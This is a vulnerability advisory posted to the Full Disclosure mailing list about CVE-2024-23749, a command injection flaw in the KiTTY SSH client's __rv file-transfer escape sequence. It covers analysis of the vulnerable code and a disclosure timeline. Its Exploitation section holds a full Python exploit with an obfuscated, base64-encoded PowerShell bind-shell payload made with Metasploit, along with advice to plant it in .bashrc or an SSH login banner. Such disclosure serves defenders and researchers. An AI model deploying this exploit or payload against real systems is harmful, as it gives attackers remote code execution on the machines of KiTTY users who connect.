-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA512
Command Injection Vulnerability in KiTTY Get Remote File Through SCP Input
(CVE-2024-23749)
===========================================================================================
Contents:
---------
Summary
Analysis
Exploitation
Acknowledgments
Timeline
Additional Advisory
Summary:
--------
Austin A. DeFrancesco (DEFCESCO) discovered a command injection vulnerability
in KiTTY (https://github.com/cyd01/KiTTY/). This vulnerability:
- Is exploitable by any KiTTY user connecting to a host with the embedded
exploit;
- The vulnerability was introduced in the original release in May 2021
(commit 4f79b1e) and affects all versions up to KiTTY ≤ 0.76.1.13 in their
default configuration.
Austin developed an exploit for this vulnerability and obtained remote code
execution in the context of the user running the application; by default, KiTTY
can be operated in the user permission group of Standard Users. This exploit is
stable and repeatable on all Microsoft Windows operating systems 11/10/8/7/XP.
Analysis:
---------
CVE-2024-23749 command injection vulnerability is in `kitty.c` precisely the
`GetOneFile` function. The vulnerable lines of code are on lines `2369-2386`;
in the latest revision `75fa2abcd220c172`
(https://github.com/cyd01/KiTTY/blob/75fa2abcd220c17249ff7252f8d5224137001f2d/kitty.c#L2369C4-L2391C2).
If KiTTY encounters the ANSI escape sequence `\\033]0;__rv` in a stream, it
interprets it as an instruction to transfer files using Putty Secure Copy
Protocol (PSCP):
- `\\033`: This is the escape character (octal representation of ASCII ESC),
which signals the beginning of an escape sequence.
- `]0;`: This sequence part indicates a metacommand will be defined.
- `__rv`: This is the vulnerable KiTTY command to transfer files using PSCP,
which takes the input of a filename or file path.
- `\\077`: This is the terminator sequence to indicate the end of the escape
sequence.
- KiTTY’s `kitty.c` `__rv` command runs through specific handling based on
the input parameters and configurations.
After the series of specific handling requests for other input parameters and
configurations (at lines 2277-2368), KiTTY checks if the `filename` is larger
than zero and checks if the `filename` is a directory or a single filename (at
lines 2372). After these parameter and configuration checks, the filename is
concatenated to the `buffer` (at line 2377). Finally, the constructed buffer is
executed using the `system( buffer )` (at line 2386).
CVE-2024-24749, where the `filename` variable is vulnerable to command
injection, occurs due to insufficient input sanitization and validation,
failure to escape special characters, and insecure system calls (at lines
2369-2390). This allows an attacker to add inputs inside the `filename`
variable, leading to arbitrary code execution.
2369 if( filename[0]=='/' ) { 2370 strcat(buffer, filename ) ; 2371 } else {
2372 if( (directory!=NULL) && (strlen(directory)>0) && (strlen(filename)>0) ) {
2373 strcat( buffer, directory ) ; strcat( buffer, "/" ) ; strcat( buffer,
filename ) ; 2374 } else if( (directory!=NULL) && (strlen(directory)>0) ) {
2375 strcat(buffer, directory ) ; strcat( buffer, "/*") ; 2376 } else { 2377
strcat(buffer, filename ) ; 2378 } 2379 } 2380 strcat( buffer, "\" \"" ) ;
strcat( buffer, dir ) ; strcat( buffer, "\"" ) ; 2381 //strcat( buffer, " >
kitty.log 2>&1" ) ; //if( !system( buffer ) ) unlink( "kitty.log" ) ; 2382 2383
chdir( InitialDirectory ) ; 2384 2385 if( debug_flag ) { debug_logevent( "Get
on file: %s", buffer) ; } 2386 if( system( buffer ) ) { MessageBox( NULL,
buffer, "Transfer problem", MB_OK|MB_ICONERROR ) ; } 2387 2388
//debug_log("%s\n",buffer);//MessageBox( NULL, buffer, "Info",MB_OK ); 2389
2390 memset(buffer,0,strlen(buffer)); 2391 }
Exploitation:
-------------
### __rv Command Injection:
From an attacker’s point of view, the exploit CVE-2024-23749 can be inserted
into the `.bashrc` file for all users or in the SSH warning/message of the day
(MOTD) banner. The exploit will trigger once the user logs in or is presented
with the SSH warning/MOTD banner.
KiTTY’s `__rv` function crashed (at line 2601) because adjacent memory was
overwritten.
To reproduce the vulnerability, follow these steps:
1. Start KiTTY and start an SSH session.
2. Update the payload handler and payload documented in the exploit’s comments.
3. Save the exploit on the connected SSH session.
4. Execute the exploit using Python: `python3 CVE-2024-23749.py`.
#!/usr/bin/python
#----------------------------------------------------------------------------------------#
# Exploit: KiTTY ≤ 0.76.1.13 Command Injection Vulnerability in KiTTY
#
# Get Remote File Through SCP Input (CVE-2024-23749)
#
# OS: Microsoft Windows 11/10/8/7/XP
#
# Author: DEFCESCO (Austin A. DeFrancesco)
#
# Software:
#
#
<https://github.com/cyd01/KiTTY/releases/download/v0.76.1.13/kitty-bin-0.76.1.13.zip>
#
#----------------------------------------------------------------------------------------#
# More details can be found on my blog:
<https://blog.DEFCESCO.io/Hell0+KiTTY> #
#----------------------------------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > to_handler
#
# [*] Payload Handler Started as Job 1
#
# msf6 payload(cmd/windows/powershell_bind_tcp) >
#
# [*] Started bind TCP handler against 192.168.100.28:4444
#
# [*] Powershell session session 1 opened (192.168.100.119:36969 ->
192.168.100.28:4444) #
#----------------------------------------------------------------------------------------#
import os
import sys
#-----------------------------------------------------------------#
# msf6 payload(cmd/windows/powershell_bind_tcp) > generate -f raw #
#-----------------------------------------------------------------#
shellcode = b'powershell.exe -nop -w hidden -noni -ep bypass
"&([scriptblock]::create'
shellcode += b'((New-Object System.IO.StreamReader(New-Object
System.IO.Compression.G'
shellcode += b'zipStream((New-Object
System.IO.MemoryStream(,[System.Convert]::FromBa'
shellcode +=
b'se64String(((\\'H4sIAE7efGUCA5VVTW/b{2}BC{1}+1cMD{2}1GQiTCDXoKkGJdNV0Ey'
shellcode +=
b'LZGlTYHw0BoahxrQ5NekoptJP7vJSXqw3\\'+\\'GCbXWwJc7w8fHNG3JRCmYKKeBvNMktzh'
shellcode +=
b'kvUBgYPA3APsGG\\'+\\'wQV8wU3ydf4vMgPJzW6NX+gK7aAhNj+t8ptk8l3jJ1zQkptUYW4'
shellcode +=
b'jBeXa\\'+\\'QgRGld\\'+\\'hmTZTc7siLDDveG2lyB/vBoqG4lhtU{1}suygyo+oYquwvp{1'
shellcode +=
b'}mhlViPtZkMrVioo8PhzNNGdSvBj8JDeCS5pXo5HHVJKh1u\\'+\\'AFWMm85{2}gI/hVGUK'
shellcode +=
b'cUCwibZSDB/2A4L0Q+jKpgPa+aywttUKCy\\'+\\'k6fZzr6viFMtk+wBjSY3bH3tM2bv7XM'
shellcode +=
b'8kWhDlXHr\\'+\\'+pWrqC/RRS{1}vzBiujQWsyxHWVPZv0VX4iErjMeMWulfy15inE7/QcB'
shellcode +=
b'g76n6{1}Qa2ZNgrpyhGs8Yj1VlaNWWIdpbokNSNnj6GvQI+P1jxrwN6ghKxUhdmRrEkN/f'
shellcode +=
b'pxsLA+wjh8Cm4s+h4SqmF6M{2}cbrqTBFJUpFgWjBn{1}QXuTUmS2lnM8pe5hF0St0yLg0'
shellcode +=
b'S+dUN2ms{2}zECUXIeDw3X786GnkEfoFWm21lfuul8Z3A6mwXu35luRMjZyD7PfzyN{\\'+'
shellcode +=
b'\\'1}l5dFHkTDqcGt4agYDJ3jj4/H2fp1VXkFP/ocsLhrbWm3GiYu{2}bJlsg5qFIImw\\'+'
shellcode +=
b'\\'1Wj1Jbew7hFAIUj+fuS7jmPrVjtjRtgMnVujRd8E6kcr\\'+\\'1Txf3SQJhG8E/BlNRyY'
shellcode +=
b'SCVai1VJSGBsVvMJWlQaLEfMSd34k5443k5yK0tBobdxuJR3H2Qax\\'+\\'T3Ztk3Tt{2}2'
shellcode +=
b'fesc{2}ef3VJqezuDaQjpZfMuTlufvc21mfZbqkrKl5VyDQiHaI6XL6mi7Jzw4iSPS7LY+'
shellcode +=
b'tBqk6PlKPMoHTC63a6uttnq3KPu+pTbLgmMYBkXlunoT35DmYe2xGEYxBAfsI0gEwuhI0k'
shellcode +=
b'unH+Y3Vsu3LgXfmC6FVBpfes07FNte1FHpofnzodpd\\'+\\'IyoERfSimrYbXTGP{1}g1Jc'
shellcode +=
b'7\\'+\\'jV4Gcf/nwHz/C1NEmNCt48B1BnUAnSAJ/CySSDE/tf6X8tWeXhiEyoWbroBzjpQL'
shellcode +=
b'a{2}SIBKSTUdzQ4W67Gu4oRxpCqMXmNw0f+wrbYdHBv4l/zbwfyvY/uGPfJrM+czL/Wyve'
shellcode +=
b'/8weMP85RLjX4/VTs2t1DfMN3VlBm5bu4j/2ud2V7lbe3cFfoTVXnPBo0IAAA{0}\\')-f'
shellcode +=
b'\\'=\\',\\'9\\',\\'O\\')))),[System.IO.Compression.CompressionMode]::Decompr'
shellcode += b'ess))).ReadToEnd()))\\"'
escape_sequence = b'\\033]0;__rv:'
escape_sequence += b'" & '
escape_sequence += shellcode
escape_sequence += b' #\\007'
stdout = os.fdopen(sys.stdout.fileno(), 'wb')
stdout.write(escape_sequence)
stdout.flush()
Acknowledgments:
----------------
Austin thanks the MITRE CVE Assignment Team for their assistance with the CVE
service requests.
Timeline:
---------
2024-01-08: This advisory contains one vulnerability and one additional
advisory totaling three vulnerabilities sent to KiTTY maintainer Cyril Dupont;
no reply from Cyril.
2024-01-28: Follow-up email with assigned CVE numbers and full writeups sent to
Cyril Dupont; no reply.
2024-02-07: Public Advisory & Exploits Release Date (6:00 PM UCT).
Additional Advisory:
--------------------
Buffer Overflow Vulnerabilities in KiTTY Start Duplicated Session Hostname
(CVE-2024-25003) & Username (CVE-2024-25004) Variables:
https://blog.defcesco.io/CVE-2024-25003-CVE-2024-25004
-----BEGIN PGP SIGNATURE-----
Version: ProtonMail
wnUEARYKACcFgmXDxSAJkLsLizjqexAlFiEETZ4dNJxyJAAtf1r5uwuLOOp7
ECUAAFkhAQD2y/dueupEMnNKAxNfh243Q25I+ofw2gxvT1cg6nkniQEAgH5A
7uuWKGMhwDEqQCrVtc2+yZ3h1hbdJI/8ZbCLhAc=
=j94V
-----END PGP SIGNATURE-----
Attachment:
publickey - austin@defcesco.io - 0x4D9E1D34.asc
Description: application/pgp-keys
Attachment:
publickey - austin@defcesco.io - 0x4D9E1D34.asc.sig
Description: PGP signature
_______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: https://seclists.org/fulldisclosure/